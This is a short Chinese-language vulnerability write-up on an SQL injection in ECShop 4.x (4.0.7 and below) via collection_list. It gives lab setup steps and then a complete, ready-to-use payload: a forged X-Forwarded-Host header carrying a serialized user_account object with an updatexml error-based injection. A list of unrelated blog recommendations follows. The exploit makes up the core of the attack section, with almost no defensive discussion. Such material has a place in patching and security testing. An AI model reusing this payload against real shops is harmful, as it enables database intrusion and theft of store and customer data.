ECShop 4.x collection_listSQL注入

漏洞描述

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序

影响版本:ecshop4.0.7 及以下

漏洞环境及利用

docker环境搭建

访问8080端口,数据库主机为mysql,账号密码为root

注册一个账户然后登录

payload

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

漏洞利用

相关推荐
李詹5 小时前
WAF防护规则配置技巧与企业级安全实践指南
网络·tcp/ip·安全·架构·ddos
网安小陈6 小时前
【网安】处理项目中的一些常见漏洞bug(java相关)
java·开发语言·数据库·安全·web安全·网络安全·bug
Bruce_Liuxiaowei6 小时前
网络安全应急响应-文件痕迹排查
安全·web安全
网安小陈7 小时前
【云计算】打造高效容器云平台:规划、部署与架构设计
android·安全·web安全·网络安全·云计算·xss
EasyGBS7 小时前
如何实现两个视频融合EasyCVR平台的数据同步?详细步骤指南
大数据·网络·人工智能·安全·音视频
Ethan_Zhou【数据恢复专家】7 小时前
mac 卸载流氓软件安全助手
安全·macos
雪山青木8 小时前
php-cgi参数注入攻击经历浅谈
开发语言·网络安全·阿里云·php
Bruce_Liuxiaowei10 小时前
基于Python Flask快速构建网络安全工具资源库的Web应用实践
python·web安全·flask
神经毒素10 小时前
WEB安全--内网渗透--捕获NET-NTLMv2 Hash
安全·web安全·内网渗透·ntlm